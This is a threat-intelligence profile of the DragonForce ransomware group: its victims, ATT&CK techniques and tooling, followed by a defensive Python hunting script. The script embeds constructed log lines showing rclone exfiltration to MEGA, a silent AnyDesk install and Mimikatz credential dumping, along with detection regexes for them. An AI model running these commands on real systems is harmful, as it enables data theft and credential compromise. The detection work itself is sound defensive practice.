DragonForce Ransomware – Hacktivist Turned Cybercriminal Enterprise

DragonForce is a ransomware and data extortion group that evolved from a pro-Palestinian hacktivist collective into a financially motivated cybercriminal enterprise.

    Overview

    DragonForce is a ransomware and data extortion group that is believed to have evolved from a pro-Palestinian hacktivist collective into a financially motivated cybercriminal enterprise. The ransomware operation emerged in late 2023 and gained notoriety in 2024 and 2025 through attacks across the retail, education, and manufacturing sectors. Since 2024 it has run a ransomware-as-a-service (RaaS) programme, so much of the hands-on intrusion activity in the incidents below was carried out by affiliates rather than the core group. DragonForce practises double extortion: it both encrypts data and threatens to publish stolen files on its public leak site, “DragonLeaks.” Its messaging suggests a hybrid structure, blending ideological narratives with profit-driven ransomware operations.

    Known Aliases

    • DragonForce Malaysia (former hacktivist identity)
    • DragonForce Ransomware Gang
    • DragonLeaks (leak site)
    • DFRansom

    Country of Origin

    DragonForce ransomware is believed to originate from Malaysia, with core affiliations tracing back to Southeast Asia.

    Notable Attacks / High-Profile Victims of DragonForce Ransomware

    1. Marks & Spencer (M&S) – April 2025

    In late April 2025, M&S, one of Britain’s largest department store chains, suffered a significant ransomware attack that disrupted online orders, in-store payment systems, and warehouse operations. The attackers gained unauthorized access to customer data, including names, addresses, and order histories. Security researchers linked the breach to DragonForce affiliates, who deployed the DragonForce encryptor on M&S’s network. The intrusion reportedly used techniques associated with the “Scattered Spider” group, suggesting that initial access was gained through social engineering of staff rather than a software exploit.

    Sources: The Guardian

    2. Co-op Group – April 2025

    Shortly after the M&S incident, the Co-op Group, a major UK grocery and insurance retailer, experienced a cyberattack that disrupted supply chains and led to empty shelves across stores. The attack compromised ordering and logistics systems, and the intruders accessed customer and employee data. While Co-op initially described the incident as contained, internal communications revealed significant concern, including the suspension of VPN access and instructions to staff to stay vigilant on digital platforms. The attack pattern matches that of DragonForce’s affiliates, with social engineering used for initial access.

    3. Harrods – May 2025

    In early May 2025, Harrods, the luxury London department store, confirmed a cyberattack that led to the restriction of internet access across its stores and facilities as a precaution. While Harrods stated that its stores remained operational and online shopping was unaffected, the timing and similarity to the M&S and Co-op attacks raised speculation of a coordinated campaign. However, there is no official confirmation linking DragonForce to this incident.

    4. Saudi Real Estate and Construction Firm – February 2025

    DragonForce targeted a prominent real estate and construction company in Riyadh, Saudi Arabia, exfiltrating over 6 terabytes of sensitive data. The attack was timed shortly before Ramadan to increase pressure on the victim to pay. When the company refused, DragonForce published the stolen data, including confidential client and operational documents. This was the group’s first major ransomware incident against a large enterprise in the Kingdom.

    Sources: Gurucul, gbhackers.com, builtenvironmentme.com

    5. Ohio Lottery – December 2023

    DragonForce breached the Ohio Lottery’s systems and claimed to have stolen over 600 GB of data, including sensitive personal information such as names, email addresses, and Social Security Numbers. The attack demonstrated the group’s willingness and ability to target government-operated entities.

    6. Yakult Australia – Date Unspecified

    The group claimed a breach of Yakult Australia’s systems, exfiltrating approximately 95.19 GB of company data. Details about the specific nature of the data or the impact on operations remain limited.

    7. Coca-Cola Singapore – Date Unspecified

    DragonForce claimed to have breached Coca-Cola’s Singapore operations, stealing over 400 GB of data. The specifics of the data compromised and the operational impact have not been publicly disclosed.

    Sources: Red Piranha, Solace Cyber

    MITRE ATT&CK Tactics and Techniques Used by DragonForce Ransomware

    DragonForce and its affiliates use tactics and techniques commonly observed in financially motivated ransomware intrusions. Where the page names a sub-technique ID, the sub-technique name is given:

    Tactic                Technique                                                       ID
    Initial Access        Exploit Public-Facing Application                               T1190
    Initial Access        Valid Accounts (stolen credentials)                             T1078
    Execution             Command and Scripting Interpreter: PowerShell                   T1059.001
    Persistence           Create or Modify System Process                                 T1543
    Privilege Escalation  Abuse Elevation Control Mechanism                               T1548
    Defense Evasion       Obfuscated Files or Information                                 T1027
    Credential Access     OS Credential Dumping                                           T1003
    Lateral Movement      Remote Services (e.g., RDP, SMB)                                T1021
    Exfiltration          Exfiltration Over Web Service: Exfiltration to Cloud Storage    T1567.002
    Impact                Data Encrypted for Impact                                       T1486

    Malware Strains Used by DragonForce Ransomware

    • Custom ransomware payloads built from publicly available builder kits (the original DragonForce encryptor was derived from the leaked LockBit 3.0 builder)
    • Phobos (earlier campaigns)
    • Cobalt Strike (post-exploitation)
    • Rclone and MEGA (data exfiltration)
    • Mimikatz (credential harvesting)
    • Remote access tools such as AnyDesk and TeamViewer

    Common Methods of Infiltration Used by DragonForce Ransomware

    • Exploiting unpatched vulnerabilities in public-facing systems (e.g., Fortinet appliances, WordPress sites)
    • Phishing emails targeting administrators or IT staff
    • Use of compromised remote desktop credentials (purchased or stolen)
    • Abuse of weak MFA implementations, with social engineering of staff used to get around them; flat, unsegmented networks then let a single foothold reach the rest of the estate
    • Deployment of legitimate remote access tools to maintain persistence
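    The tooling and infiltration methods listed above are all visible in process-creation telemetry, so the practical question for a defender is what to hunt for. The following is an added example written for this page (not code from the page’s author, and not DragonForce’s own tooling): a small Python hunt that maps Rclone/MEGA exfiltration, AnyDesk/TeamViewer deployment, Mimikatz credential dumping and RDP lateral movement to ATT&CK IDs and runs the rules over constructed log lines. The JSON field names (Computer, User, Image, CommandLine) follow the Sysmon Event ID 1 style and are an assumption about your collector’s schema; the sample events are constructed, not real telemetry; and T1219 (Remote Access Software) and T1021.001 (RDP) are standard ATT&CK IDs that go beyond the page’s table.

```python
"""Hunt for DragonForce-style tradecraft in Windows process-creation logs.

Added example for this page: not the page author's code and not DragonForce
tooling. Field names follow Sysmon Event ID 1 style and are an assumption
about the collector's schema. The sample events below are constructed.
"""
import json
import re
from collections import defaultdict

# Constructed sample telemetry (not real events): one JSON object per line,
# as a SIEM export or Sysmon forwarder would emit it. The "mk.exe" line is
# Mimikatz renamed, to show that matching on module syntax still catches it.
SAMPLE_LOG = r'''
{"EventID":1,"Computer":"WS-FIN-07","User":"CORP\\jsmith","Image":"C:\\Users\\jsmith\\AppData\\Local\\Temp\\rclone.exe","CommandLine":"rclone.exe copy \"D:\\Finance\" mega:archive --transfers 16 --no-check-certificate"}
{"EventID":1,"Computer":"WS-FIN-07","User":"CORP\\jsmith","Image":"C:\\Users\\jsmith\\Downloads\\AnyDesk.exe","CommandLine":"AnyDesk.exe --install \"C:\\Program Files (x86)\\AnyDesk\" --start-with-win --silent"}
{"EventID":1,"Computer":"DC01","User":"CORP\\svc_backup","Image":"C:\\Windows\\Temp\\mk.exe","CommandLine":"mk.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit"}
{"EventID":1,"Computer":"WS-FIN-07","User":"CORP\\jsmith","Image":"C:\\Windows\\System32\\mstsc.exe","CommandLine":"mstsc.exe /v:10.0.5.12 /admin"}
{"EventID":1,"Computer":"WS-HR-02","User":"CORP\\amiller","Image":"C:\\Windows\\System32\\svchost.exe","CommandLine":"C:\\Windows\\System32\\svchost.exe -k netsvcs -p"}
'''.strip().splitlines()

# Detection rules: (rule name, ATT&CK ID, regex over the lowercased command
# line). T1219 and T1021.001 are standard ATT&CK IDs not in the page's table.
RULES = [
    ("rclone_to_cloud", "T1567.002",
     re.compile(r"rclone(\.exe)?\b.*\b(copy|sync|move)\b.*\b(mega|s3|b2|drive|dropbox|onedrive)\b")),
    ("megacmd_upload", "T1567.002",
     re.compile(r"\b(megacmd|megaput|mega-put|megasync)(\.exe)?\b")),
    ("remote_access_tool", "T1219",
     re.compile(r"\b(anydesk|teamviewer)(\.exe)?\b")),
    # Match Mimikatz module syntax, not the file name, so a renamed binary still hits.
    ("mimikatz_modules", "T1003",
     re.compile(r"mimikatz|sekurlsa::|lsadump::")),
    ("rdp_client_to_host", "T1021.001",
     re.compile(r"\bmstsc(\.exe)?\b.*/v:")),
]


def hunt(lines):
    """Return one hit dict per (event, rule) match, preserving event order."""
    hits = []
    for raw in lines:
        evt = json.loads(raw)
        cmd = evt.get("CommandLine", "").lower()
        for name, attack_id, rx in RULES:
            if rx.search(cmd):
                hits.append({
                    "host": evt.get("Computer"),
                    "user": evt.get("User"),
                    "rule": name,
                    "attack_id": attack_id,
                    "cmd": evt.get("CommandLine"),
                })
    return hits


def stages_by_host(hits):
    """Collapse hits to {host: sorted unique ATT&CK IDs seen on that host}."""
    seen = defaultdict(set)
    for h in hits:
        seen[h["host"]].add(h["attack_id"])
    return {host: sorted(ids) for host, ids in seen.items()}


def multi_stage_hosts(stages, min_techniques=2):
    """Hosts showing two or more distinct techniques. Several kill-chain
    stages on one host is a far stronger intrusion signal than any one rule."""
    return sorted(h for h, ids in stages.items() if len(ids) >= min_techniques)


if __name__ == "__main__":
    found = hunt(SAMPLE_LOG)
    for h in found:
        print(f"{h['host']:10} {h['attack_id']:10} {h['rule']:20} {h['cmd']}")
    print("escalate:", multi_stage_hosts(stages_by_host(found)))
```

    On the constructed sample, WS-FIN-07 shows exfiltration, remote-access-tool installation and an outbound RDP session, which is exactly the cluster an affiliate leaves behind between initial access and encryption; DC01 shows only the credential dump. The regexes are deliberately narrow so the example stays readable; in production you would also key on parent process, signer and the user context (a service account running mstsc is itself suspicious) rather than on command lines alone.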
